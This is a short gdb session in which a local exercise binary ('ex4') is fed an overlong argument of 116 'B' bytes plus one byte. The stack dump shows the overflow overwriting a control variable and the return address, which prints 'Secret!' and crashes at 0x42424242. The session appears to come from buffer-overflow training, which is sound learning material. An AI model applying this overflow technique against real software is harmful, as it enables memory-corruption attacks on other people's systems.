(gdb) break *0x08048497
Breakpoint 1 at 0x8048497
(gdb) run "`python -c 'print "B"*116 + "\x01"'`"
Starting program: /root/Desktop/ex4 "`python -c 'print "B"*116 + "\x01"'`"

Breakpoint 1, 0x08048497 in func ()
(gdb) x /50x $esp
0xbffff3e0:	0xbffff3fc	0xbffff697	0xb7ffeff4	0xbffff4e0
0xbffff3f0:	0xb7fffac0	0xbffff4b4	0xb7feb662	0x42424242
0xbffff400:	0x42424242	0x42424242	0x42424242	0x42424242
0xbffff410:	0x42424242	0x42424242	0x42424242	0x42424242
0xbffff420:	0x42424242	0x42424242	0x42424242	0x42424242
0xbffff430:	0x42424242	0x42424242	0x42424242	0x42424242
0xbffff440:	0x42424242	0x42424242	0x42424242	0x42424242
0xbffff450:	0x42424242	0x42424242	0x42424242	0x42424242
0xbffff460:	0x42424242	0x42424242	0x42424242	0x42424242
0xbffff470:	0x00000001	0xbffff697	0x0804850b	0xb7fbeff4
0xbffff480:	0x08048500	0x00000000	0xbffff508	0xb7e75e66
0xbffff490:	0x00000002	0xbffff534	0xbffff540	0xb7fe0860
0xbffff4a0:	0xb7ff6821	0xffffffff
(gdb) continue
Continuing.
Secret!

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()